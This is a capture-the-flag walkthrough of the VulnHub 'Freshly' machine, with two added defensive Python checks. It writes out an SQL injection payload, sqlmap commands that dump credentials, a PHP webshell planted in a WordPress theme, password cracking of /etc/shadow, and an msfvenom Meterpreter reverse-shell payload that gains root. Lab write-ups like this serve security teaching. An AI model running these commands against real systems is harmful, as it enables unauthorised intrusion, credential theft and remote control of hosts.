VulnHub-Freshly Writeup

Goal

The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. :)

There are a couple of different ways that you can go with this one. Good luck!

Simply download and import the OVA file into virtualbox!

VulnHub note: You may have issues when importing to VMware. If this is the case, extract the HDD from the OVA file (using something like 7zip), and attach to a new VM. Please see the following guide: https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/.

Information gathering

Port scan

Quick scan

nmap -T4 -F 192.168.1.104

Nmap scan report for 192.168.1.104
Host is up (0.00018s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
8080/tcp open http-proxy
MAC Address: 08:00:27:D4:BC:A6 (Oracle VirtualBox virtual NIC)

Port 80 serves only an image.

The main site is found on port 8080: http://192.168.1.104:8080/wordpress/

It is a WordPress site.

wpscan scan

Scan the WordPress installation:

wpscan --url http://192.168.1.104:8080/wordpress/

Result:

...
[+] WordPress version 4.1.26 identified (Latest, released on 2019-03-13).
...
[+] WordPress theme in use: twentythirteen
...
| Version: 1.4 (80% confidence)

[i] Plugin(s) Identified:

[+] all-in-one-seo-pack
| Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/
| Last Updated: 2019-02-20T19:20:00.000Z
| [!] The version is out of date, the latest version is 2.12
|
| Detected By: Comment (Passive Detection)
|
| [!] 5 vulnerabilities identified:
|
| [!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure
| Fixed in: 2.2.6
| References:
| - https://wpvulndb.com/vulnerabilities/7881
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
| - http://jvn.jp/en/jp/JVN75615300/index.html
| - http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
|
| [!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
| Fixed in: 2.2.6.2
| References:
| - https://wpvulndb.com/vulnerabilities/7916
| - https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
|
| [!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 2.3.7
| References:
| - https://wpvulndb.com/vulnerabilities/8538
| - http://seclists.org/fulldisclosure/2016/Jul/23
| - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
| - https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
| - https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability
| - https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/
|
| [!] Title: All in One SEO Pack <= 2.3.7 - Unauthenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 2.3.8
| References:
| - https://wpvulndb.com/vulnerabilities/8558
| - https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/
| - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
|
| [!] Title: All in One SEO Pack <= 2.9.1.1 - Authenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 2.10
| References:
| - https://wpvulndb.com/vulnerabilities/9159
| - https://www.ripstech.com/php-security-calendar-2018/#day-4
| - https://wordpress.org/support/topic/a-critical-vulnerability-has-been-detected-in-this-plugin/
| - https://semperfiwebdesign.com/all-in-one-seo-pack-release-history/
|
| Version: 2.2.5.1 (60% confidence)
| Detected By: Comment (Passive Detection)
| - http://192.168.1.104:8080/wordpress/, Match: 'All in One SEO Pack 2.2.5.1 by'

[+] cart66-lite
| Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/
| Last Updated: 2016-01-27T21:11:00.000Z
| [!] The version is out of date, the latest version is 1.5.8
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Cart66 Lite <= 1.5.3 - SQL Injection
| Fixed in: 1.5.4
| References:
| - https://wpvulndb.com/vulnerabilities/7737
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9442
| - https://research.g0blin.co.uk/cve-2014-9442/
|
| [!] Title: Cart66 Lite 1.5.4 - XSS
| Fixed in: 1.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8014
| - http://packetstormsecurity.com/files/130307/
|
| Version: 1.5.3 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt

[+] contact-form-7
| Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/
| Last Updated: 2018-12-18T18:05:00.000Z
| [!] The version is out of date, the latest version is 5.1.1
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
| Fixed in: 5.0.4
| References:
| - https://wpvulndb.com/vulnerabilities/9127
| - https://contactform7.com/2018/09/04/contact-form-7-504/
| - https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
| - https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
| - https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
| - https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
| - https://www.ripstech.com/php-security-calendar-2018/#day-18
|
| Version: 4.1 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt

[+] proplayer
| Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: ProPlayer 4.7.9.1 - SQL Injection
| References:
| - https://wpvulndb.com/vulnerabilities/6912
| - https://www.exploit-db.com/exploits/25605/
|
| Version: 4.7.9.1 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/readme.txt

The scan reveals the WordPress version, the installed plugins and their known vulnerabilities. I tested the plugins flagged above with SQL injection, but none of the attempts succeeded.

Enumerate usernames:

wpscan --url http://192.168.1.104:8080/wordpress/ --enumerate u

Result:

[i] User(s) Identified:

[+] admin
| Detected By: Rss Generator (Passive Detection)
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

Password attack:

wpscan --url http://192.168.1.104:8080/wordpress --usernames admin --password-attack wp-login -P word1000.txt

No password was found.

Directory scan

Scanning http://192.168.1.104/ with the Yujian (御剑) directory scanner finds phpmyadmin and login.php.

Logging into phpmyadmin does not work.

Exploitation

SQL injection

Against login.php:

Entering admin' or sleep(10)# causes a clear delay in the page response, so the login form is injectable. Use sqlmap:

sqlmap.py -u "http://192.168.1.104/login.php" --forms

No injection point is found; raise the level and risk:

sqlmap.py -u "http://192.168.1.104/login.php" --forms --level=5 --risk=3

The injection point is now found:

sqlmap identified the following injection point(s) with a total of 6020 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: user=admin'||(SELECT 'CIgz' FROM DUAL WHERE 2964=2964 AND SLEEP(5))||'&password=uUbb&s=Submit
---
do you want to exploit this SQL injection? [Y/n] y
[23:21:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12

Run the following commands in turn:

sqlmap.py -u "http://192.168.1.104/login.php" --forms --dbs

sqlmap.py -u "http://192.168.1.104/login.php" --forms --tables -D "wordpress8080"

sqlmap.py -u "http://192.168.1.104/login.php" --forms --columns -T "users" -D "wordpress8080"

sqlmap.py -u "http://192.168.1.104/login.php" --forms --dump -C "username,password" -T "users" -D "wordpress8080"

This yields the WordPress credentials:

Table: users
[1 entry]
+----------+---------------------+
| username | password |
+----------+---------------------+
| admin | SuperSecretPassword |
+----------+---------------------+
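
As a defender-side illustration added here (not part of the original writeup), the following Python function flags login POST bodies that carry the time-based blind injection markers seen above. The sample bodies are constructed from the two payloads quoted in this writeup plus one benign login.

```python
import re
from urllib.parse import parse_qs

# Markers typical of the time-based blind injections shown above:
# a SLEEP()/BENCHMARK() call, a quote that breaks out of the string literal
# followed by a boolean operator, and a trailing comment that discards the
# remainder of the original query.
TIME_FUNCS = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
QUOTE_BREAK = re.compile(r"'\s*(?:or\b|and\b|\|\||&&)", re.IGNORECASE)
TRAIL_COMMENT = re.compile(r"(#|--\s|/\*)")


def suspicious_params(body: str) -> dict:
    """Return {param: [reasons]} for each form field that looks injected."""
    hits = {}
    # parse_qs already percent-decodes values and turns '+' into spaces
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            reasons = []
            if TIME_FUNCS.search(value):
                reasons.append("time-delay function")
            if QUOTE_BREAK.search(value):
                reasons.append("quote followed by boolean operator")
            if TRAIL_COMMENT.search(value):
                reasons.append("SQL comment")
            if reasons:
                hits.setdefault(name, []).extend(reasons)
    return hits


def scan_bodies(bodies):
    """Classify each request body; returns a list of (body, hits) pairs."""
    return [(b, suspicious_params(b)) for b in bodies]


# Constructed sample bodies: a normal login, the manual sleep(10) test and
# the sqlmap payload reported above (percent-encoded as a browser would send it).
SAMPLE_BODIES = [
    "user=admin&password=hunter2&s=Submit",
    "user=admin%27+or+sleep%2810%29%23&password=x&s=Submit",
    "user=admin'||(SELECT 'CIgz' FROM DUAL WHERE 2964=2964 AND SLEEP(5))||'&password=uUbb&s=Submit",
]

if __name__ == "__main__":
    for body, hits in scan_bodies(SAMPLE_BODIES):
        print("ALERT" if hits else "ok   ", body[:60], hits)
```

Note that the check only applies to the decoded form fields, so it has to run where the POST body is available (a WAF or an application-level audit log), not on a standard Apache access log.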

Getting a shell through the WordPress admin panel

After logging into the WordPress admin panel, go to Appearance > Editor, pick any PHP file of the theme, insert a one-line PHP webshell, and connect to it with China Chopper (菜刀).

Open the virtual terminal in China Chopper:

[/etc/]$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

The current user is not root. Check /etc/passwd:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
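
An added defender-side check, not from the original writeup: a small auditor for /etc/passwd that reports the anomalies visible in the listing above, namely lines that are not seven colon-separated fields (the two comment lines carrying the secret, which passwd(5) has no syntax for), accounts with an empty shell field (login treats that as /bin/sh), and any extra UID 0 accounts. The sample is an excerpt of the listing above.

```python
# Excerpt of the /etc/passwd listing shown above, embedded as sample input.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
"""

NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def audit_passwd(text: str) -> list:
    """Return (line_no, account_or_None, finding) tuples for suspicious lines."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # passwd(5) has no comment syntax; anything else is foreign data
            findings.append((no, None, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if pw not in ("x", "*"):
            findings.append((no, name, "password field not shadowed"))
        if uid == "0" and name != "root":
            findings.append((no, name, "extra UID 0 account"))
        if shell == "":
            # an empty shell field means the default /bin/sh, i.e. interactive login
            findings.append((no, name, "empty shell field (defaults to /bin/sh)"))
        elif shell not in NON_LOGIN_SHELLS and uid.isdigit() and int(uid) < 1000 and name != "root":
            findings.append((no, name, f"system account with login shell {shell}"))
    return findings


if __name__ == "__main__":
    for no, name, finding in audit_passwd(PASSWD_SAMPLE):
        print(f"line {no}: {name or '-'}: {finding}")
```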

The file contains a hint, so presumably a password has to be cracked. Download /etc/passwd and /etc/shadow and, in Kali:

unshadow passwd shadow > hashes.txt

Also add SuperSecretPassword to /usr/share/john/password.lst, then:

john hashes.txt


The root password turns out to be SuperSecretPassword.

Privilege escalation

Generate a reverse Meterpreter payload with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=5555 -f raw > frenshly.php

Upload frenshly.php to the target with China Chopper, set up the msf handler, and once the reverse Meterpreter session arrives, run the shell command to get a shell. "su - root" complains that it must be run from a terminal, so run python -c 'import pty;pty.spawn("/bin/bash")' to get a pty and complete the escalation.

meterpreter > sysinfo
Computer : Freshly
OS : Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686
Meterpreter : php/linux
meterpreter > getuid
Server username: daemon (1)
meterpreter > shell
Process 1384 created.
Channel 0 created.
su - root
su: must be run from a terminal
python -c 'import pty;pty.spawn("/bin/bash")'
tythirteen$ ^[[C^[[C^[[C^[[C^[[C1-0/apps/wordpress/htdocs/wp-content/themes/twent

tythirteen$ su - root
su - root
Password: SuperSecretPassword

root@Freshly:~# id
id
uid=0(root) gid=0(root) groups=0(root)

Summary

  • Information gathering is essential: the target's ports, directories and so on must be enumerated thoroughly.
  • Raising sqlmap's level and risk parameters makes the test more complete.
  • Know how to use the Kali tools: wpscan, john.